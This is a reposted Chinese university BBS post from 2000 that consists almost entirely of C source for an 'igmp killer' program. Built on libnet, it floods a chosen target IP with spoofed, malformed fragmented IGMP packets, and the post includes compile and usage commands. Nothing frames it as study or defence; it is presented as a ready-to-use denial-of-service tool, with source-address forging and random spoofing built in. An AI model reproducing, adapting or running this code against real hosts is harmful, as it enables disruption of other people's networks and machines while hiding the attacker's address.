荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: bstone (Less time in bbs), 信区: Hacker
标 题: igmp killer one program for i386/Linux using libn
发信站: BBS 荔园晨风站 (Sun Aug 6 19:44:29 2000), 转信
发信人: scz (小四), 信区: Security
标 题: igmp killer one program for i386/Linux using libn
发信站: 武汉白云黄鹤站 (Fri Aug 4 14:38:18 2000), 站内信件
/*
* Complie: gcc -O3 -o igmpki igmpkilleri.c `libnet-config --defines --cflags`
`libnet-config --libs`
* Usage : ./igmpki --si 192.168.10.3 --di 192.168.8.90 --num 200
* Date : 2000-08-03 22:57
*/
/*******************************************************************
* *
* 头文件 *
* *
*******************************************************************/
#define _GNU_SOURCE
#include
#include
#include /* 使用time()产生随机化种子 */
#include /* 使用getopt()长选项支持 */
#include /* 使用libnet必须包含这个头文件 */
/*******************************************************************
* *
* 宏定义 *
* *
*******************************************************************/
#define SUCCESS 0
#define FAILURE -1
#define DEFAULTIGMPNUMBER 200 /* 缺省发送IGMP报文数目 */
#define IPDATALEN 1480 /* 异常负载长度 */
/*******************************************************************
* *
* 全局变量 *
* *
*******************************************************************/
/* 用于初始化伪随机数发生器 */
u_long randomState[64] =
{
0x00000003, 0x32d9c024, 0x9b663182, 0x5da1f342, 0x7449e56b, 0xbeb1dbb0,
0xab5c5918, 0x946554fd,
0x8c2e680f, 0xeb3d799f, 0xb11ee0b7, 0x2d436b86, 0xda672e2a, 0x1588ca88,
0xe369735d, 0x904f35f7,
0xd7158fd6, 0x6fa6f051, 0x616e6b96, 0xac94efdc, 0xde3b81e0, 0xdf0a6fb5,
0xf103bc02, 0x48f340fb,
0x36413f93, 0xc622c298, 0xf5a42ab8, 0x8a88d77b, 0xf5ad9d0e, 0x8999220b,
0x27fb47b9, 0x9a319039,
0x94102000, 0x9610000a, 0xc60a0000, 0x90022001, 0x8408e07f, 0x8528800a,
0x8088e080, 0x02800004,
0x9612c002, 0x10bffff9, 0x9402a007, 0x81c3e008, 0xd6224000, 0x86102000,
0x94100003, 0xd60a0000,
0x90022001, 0x840ae07f, 0x85288003, 0x94128002, 0x808ae080, 0x12bffffa,
0x8600e007, 0x80a0e01f,
0x18800006, 0x808ae040, 0x02800004, 0x84103fff, 0x85288003, 0x94128002,
0x81c3e008, 0xd4224000
};
u_char * packet = NULL;
size_t packet_size = LIBNET_IP_H + IPDATALEN;
int rawSocket;
/*******************************************************************
* *
* 函数原型 *
* *
*******************************************************************/
void Libnet_do_checksum ( u_char * buf, int protocol, int len );
void Libnet_init_packet ( size_t p_size, u_char ** buf );
int Libnet_open_raw_sock ( int protocol );
void Libnet_write_ip ( int sock, u_char * packet, int len );
void igmpSend ( u_long srcIp, u_long dstIp );
void usage ( char * arg );
/*----------------------------------------------------------------------*/
void Libnet_do_checksum ( u_char * buf, int protocol, int len )
{
if ( libnet_do_checksum( buf, protocol, len ) == -1 )
{
libnet_error( LIBNET_ERR_FATAL, "libnet_do_checksum failed\n" );
}
return;
} /* end of Libnet_do_checksum */
void Libnet_init_packet ( size_t p_size, u_char ** buf )
{
if ( libnet_init_packet( p_size, buf ) == -1 )
{
libnet_error( LIBNET_ERR_FATAL, "Can't initialize packet\n" );
}
return;
} /* end of Libnet_init_packet */
int Libnet_open_raw_sock ( int protocol )
{
int s;
if ( ( s = libnet_open_raw_sock( protocol ) ) == -1 )
{
libnet_error( LIBNET_ERR_FATAL, "Can't open raw socket %08x\n",
protocol );
}
return( s );
} /* end of Libnet_open_raw_sock */
void Libnet_write_ip ( int sock, u_char * packet, int len )
{
int w;
if ( ( w = libnet_write_ip( sock, packet, len ) ) < len )
{
libnet_error( LIBNET_ERR_WARNING, "libnet_write_ip only wrote %d
bytes\n", w );
}
return;
} /* end of Libnet_write_ip */
void igmpSend ( u_long srcIp, u_long dstIp )
{
u_short ipDataLen;
u_short frag;
u_short bit;
bit = 0;
ipDataLen = 200; /* 200字节的负载,总共15000字节的负载 */
frag = 1850;
do
{
/* 构造IP头 */
libnet_build_ip( ipDataLen, /* IP数据区长度 */
IPTOS_LOWDELAY, /* IP tos */
19774, /* IP ID */
frag | bit, /* frag stuff */
255, /* TTL */
IPPROTO_IGMP, /* 上层协议 */
srcIp, /* big-endian序 */
dstIp, /* 目标IP */
NULL, /* 无选项 */
0, /* 选项长度零 */
packet ); /* 指向IP头 */
Libnet_write_ip( rawSocket, packet, LIBNET_IP_H + ipDataLen );
if ( frag == 0 )
{
break;
}
ipDataLen = IPDATALEN;
bit = 0x2000; /* 非最后分片 */
frag -= 185;
} while ( 1 ); /* 总共11个分片发送出去 */
return;
} /* end of igmpSend */
void usage ( char * arg )
{
fprintf( stderr, " Usage: %s [--si srcIp] [--di dstIp] [--num igmpNumber]
\n", arg );
exit( FAILURE );
} /* end of usage */
int main ( int argc, char * argv[] )
{
#define LONGOPTIONCHAR '-'
/* 定义长选项 */
static struct option longOption[] =
{
{ "si", 1, 0, LONGOPTIONCHAR }, /* 源IP */
{ "di", 1, 0, LONGOPTIONCHAR }, /* 攻击目标IP */
{ "num", 1, 0, LONGOPTIONCHAR }, /* IGMP报文数目 */
{ 0, 0, 0, 0 }
};
int longOptionIndex = 0; /* 用于处理长选项 */
/* IP使用使用网络字节序指定 */
u_long srcIp = 0xffffffff; /* 伪造的源IP */
u_long dstIp = 0xffffffff; /* 目标IP */
u_long igmpNumber = DEFAULTIGMPNUMBER; /* IGMP报文数目 */
unsigned int randomSeed = ( unsigned int )time( NULL );
int c, i;
if ( argc == 1 )
{
usage( argv[0] );
}
initstate( randomSeed, ( char * )randomState, 128 );
setstate( ( char * )randomState );
opterr = 0; /* don't want getopt() writing to stderr */
while ( ( c = getopt_long( argc, argv, "h", longOption, &longOptionIndex )
) != EOF )
{
switch ( c )
{
case LONGOPTIONCHAR: /* 处理长选项 */
/*
fprintf( stderr, "option %s", longOption[ longOptionIndex ].name );
if ( optarg )
{
fprintf( stderr, " with arg %s", optarg );
}
fprintf( stderr, "\n" );
*/
if ( optarg )
{
switch ( longOptionIndex )
{
case 0:
/* 返回值是big-endian序 */
srcIp = libnet_name_resolve( optarg, LIBNET_DONT_RESOLVE );
if ( srcIp == -1 )
{
libnet_error( LIBNET_ERR_FATAL, "Bad srcIp: %s\n",
optarg );
}
break;
case 1:
/* 返回值是big-endian序 */
dstIp = libnet_name_resolve( optarg, LIBNET_DONT_RESOLVE );
if ( dstIp == -1 )
{
libnet_error( LIBNET_ERR_FATAL, "Bad dstIp: %s\n",
optarg );
}
break;
case 2: /* 采用10进制 */
igmpNumber = ( u_long )strtoul( optarg, NULL, 10 );
if ( igmpNumber == 0 )
{
fprintf( stderr, "Check your igmpNumber\n" );
exit( FAILURE );
}
break;
default:
break;
} /* end of switch */
}
break;
case 'h':
case '?':
usage( argv[0] );
} /* end of switch */
} /* end of while */
if ( dstIp == 0xffffffff )
{
fprintf( stderr, "Check your dstIp\n" );
exit( FAILURE );
}
/* 如果未指定srcIp,随机化 */
if ( srcIp == -1 )
{
srcIp = ( u_long )random();
}
fprintf( stderr, "[ Igmp sending ... ... ]\n" );
/* 分配内存并初始化成零 */
Libnet_init_packet( packet_size, &packet );
/* 创建raw_socket */
rawSocket = Libnet_open_raw_sock( IPPROTO_RAW );
for ( i = 0; i < igmpNumber; i++ )
{
igmpSend( srcIp, dstIp );
}
/* 关闭raw_socket */
libnet_close_raw_sock( rawSocket );
/* 释放由libnet_init_packet()分配的内存 */
libnet_destroy_packet( &packet );
fprintf( stderr, "\n[ Igmp send finished ]\n" );
return( SUCCESS );
} /* end of main */
/*----------------------------------------------------------------------*/
--
也许有一天,他再从海上蓬蓬的雨点中升起,
飞向西来,再形成一道江流,再冲倒两旁的石壁,
再来寻夹岸的桃花。然而,我不敢说来生,也不敢信来生......
※ 来源:.武汉白云黄鹤站 bbs.whnet.edu.cn.[FROM: bbs.szptt.net.cn]
--------------------------------------------------------------------------------
分类讨论区 全部讨论区 上一篇 本讨论区 回文章 下一篇
--
☆ 来源:.BBS 荔园晨风站 bbs.szu.edu.cn.[FROM: bbs@192.168.28.106]
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店